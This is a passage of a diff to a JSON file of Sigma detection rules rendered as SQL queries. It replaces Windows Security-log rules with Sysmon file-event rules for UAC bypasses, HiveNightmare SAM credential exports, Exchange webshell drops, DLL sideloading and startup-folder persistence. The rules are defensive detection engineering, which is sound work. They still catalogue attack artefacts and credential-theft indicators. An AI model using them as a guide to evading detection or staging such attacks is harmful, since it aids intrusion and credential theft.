"SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "file_event_win_uac_bypass_ieinstal.yml" }, { - "title": "Security Event Log Cleared", - "id": "a122ac13-daf8-4175-83a2-72c387be339d", - "status": "test", - "description": "Checks for event id 1102 which indicates the security event log was cleared.", - "author": "Saw Winn Naung", + "title": "SCR File Write Event", + "id": "c048f047-7e2a-4888-b302-55f509d4a91d", + "status": "experimental", + "description": "Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ - "attack.t1070.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate administrative activity" + "The installation of new screen savers by third party software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE ':\\\\WUDownloadCache\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_event_log_cleared.yml" + "filename": "file_event_win_new_src_file.yml" }, { - "title": "ISO Image Mount", - "id": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", + "title": "ISO File Created Within Temp Folders", + "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", "status": "experimental", - "description": "Detects the mount of ISO images on an endpoint", - "author": "Syed Hasan (@syedhasan009)", + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", + "author": "@sam0x90", "tags": [ "attack.initial_access", "attack.t1566.001" ], "falsepositives": [ - "Software installation ISO files" + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND ObjectServer = 'Security' AND ObjectType = 'File' AND ObjectName LIKE '\\\\Device\\\\CdRom%' ESCAPE '\\') AND NOT (ObjectName LIKE '\\\\Device\\\\CdRom0\\\\setup.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\')))" ], - "filename": "win_security_iso_mount.yml" + "filename": "file_event_win_iso_file_mount.yml" }, { - "title": "Enabled User Right in AD to Control User Objects", - "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", - "status": "test", - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "author": "@neu5ron", + "title": "Suspicious File Drop by Exchange", + "id": "6b269392-9eba-40b5-acb6-55c882b20ba6", + "status": "experimental", + "description": "Detects suspicious file type dropped by an Exchange component in IIS", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1098" + "attack.t1190", + "attack.initial_access", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_alert_active_directory_user_control.yml" + "filename": "file_event_win_exchange_webshell_drop_suspicious.yml" }, { - "title": "RDP Login from Localhost", - "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "title": "Suspicious VHD Image Download From Browser", + "id": "8468111a-ef07-4654-903b-b863a80bbc95", "status": "test", - "description": "RDP login with localhost source address may be a tunnelled login", - "author": "Thomas Patzke", + "description": "Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\nMalware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.\n", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Legitimate downloads of \".vhd\" files would also trigger this" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\safari.exe' ESCAPE '\\' OR Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\whale.exe' ESCAPE '\\') AND TargetFilename LIKE '%.vhd%' ESCAPE '\\')" ], - "filename": "win_security_rdp_localhost_login.yml" + "filename": "file_event_win_mal_vhd_download.yml" }, { - "title": "Suspicious Computer Account Name Change CVE-2021-42287", - "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", - "status": "test", - "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "author": "Florian Roth (Nextron Systems)", + "title": "Creation of an WerFault.exe in Unusual Folder", + "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "status": "experimental", + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "author": "frack113", + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" + "filename": "file_event_win_werfault_dll_hijacking.yml" }, { - "title": "SysKey Registry Keys Access", - "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", + "title": "Typical HiveNightmare SAM File Export", + "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "status": "test", - "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects files written by the different tools that exploit HiveNightmare", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" ], "falsepositives": [ - "Unknown" + "Files that accidentally contain these strings" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\'))" ], - "filename": "win_security_syskey_registry_access.yml" + "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" }, { - "title": "User Added to Local Administrators", - "id": "c265cf08-3f99-46c1-8d59-328247057d57", - "status": "stable", - "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Startup Folder Persistence", + "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "status": "experimental", + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1078", "attack.persistence", - "attack.t1098" + "attack.t1547.001" ], "falsepositives": [ - "Legitimate administrative activity" + "Rare legitimate usage of some of the extensions mentioned in the rule" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4732' AND (TargetUserName LIKE 'Administr%' ESCAPE '\\' OR TargetSid = 'S-1-5-32-544')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" ], - "filename": "win_security_user_added_to_local_administrators.yml" + "filename": "file_event_win_susp_startup_folder_persistence.yml" }, { - "title": "Suspicious Outbound Kerberos Connection - Security", - "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "UAC Bypass Using IDiagnostic Profile - File", + "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "status": "experimental", + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1558.003" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Web Browsers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_susp_outbound_kerberos_connection.yml" + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Register new Logon Process by Rubeus", - "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "status": "test", - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", + "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "status": "experimental", + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "author": "frack113", "tags": [ - "attack.lateral_movement", + "attack.persistence", "attack.privilege_escalation", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" ], - "filename": "win_security_register_new_logon_process_by_rubeus.yml" + "filename": "file_event_win_iphlpapi_dll_sideloading.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", - "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", - "status": "test", - "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", - "author": "Orlinum , BlueDefenZer", + "title": "Legitimate Application Dropped Script", + "id": "7d604714-e071-49ff-8726-edeb95a70679", + "status": "experimental", + "description": "Detects programs on a Windows system that should not write scripts to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + "filename": "file_event_win_legitimate_app_dropping_script.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Registry", - "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", + "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.execution", + "attack.privilege_escalation", + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\')" ], - "filename": "win_security_dot_net_etw_tamper.yml" + "filename": "file_event_win_cve_2021_1675_printspooler.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Security", - "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential Winnti Dropper Activity", + "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "status": "test", + "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" + "filename": "file_event_win_redmimicry_winnti_filedrop.yml" }, { - "title": "Reconnaissance Activity", - "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "title": "ISO or Image Mount Indicator in Recent Files", + "id": "4358e5a5-7542-4dcb-b9f3-87667371839b", "status": "test", - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", - "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" - ], + "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Administrator activity" + "Cases in which a user mounts an image file for legitimate reasons" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.iso.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.img.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhd.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhdx.lnk' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')" ], - "filename": "win_security_susp_net_recon_activity.yml" + "filename": "file_event_win_iso_file_recent.yml" }, { - "title": "First Time Seen Remote Named Pipe", - "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "title": "Suspicious Creation TXT File in User Desktop", + "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", "status": "test", - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "author": "Samir Bousseaden", + "description": "Ransomware create txt file in the user Desktop", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" ], - "filename": "win_security_lm_namedpipe.yml" + "filename": "file_event_win_susp_desktop_txt.yml" }, { - "title": "Possible PetitPotam Coerce Authentication Attempt", - "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", - "status": "experimental", - "description": "Detect PetitPotam coerced authentication activity.", - "author": "Mauricio Velazco, Michael Haag", + "title": "UAC Bypass Using NTFS Reparse Point - File", + "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unknown. Feedback welcomed." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" ], - "filename": "win_security_petitpotam_network_share.yml" + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "Potential Privileged System Service Operation - SeLoadDriverPrivilege", - "id": "f63508a0-c809-4435-b3be-ed819394d612", + "title": "Suspicious ADSI-Cache Usage By Unknown Tool", + "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "status": "test", - "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers." + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4673' AND PrivilegeList 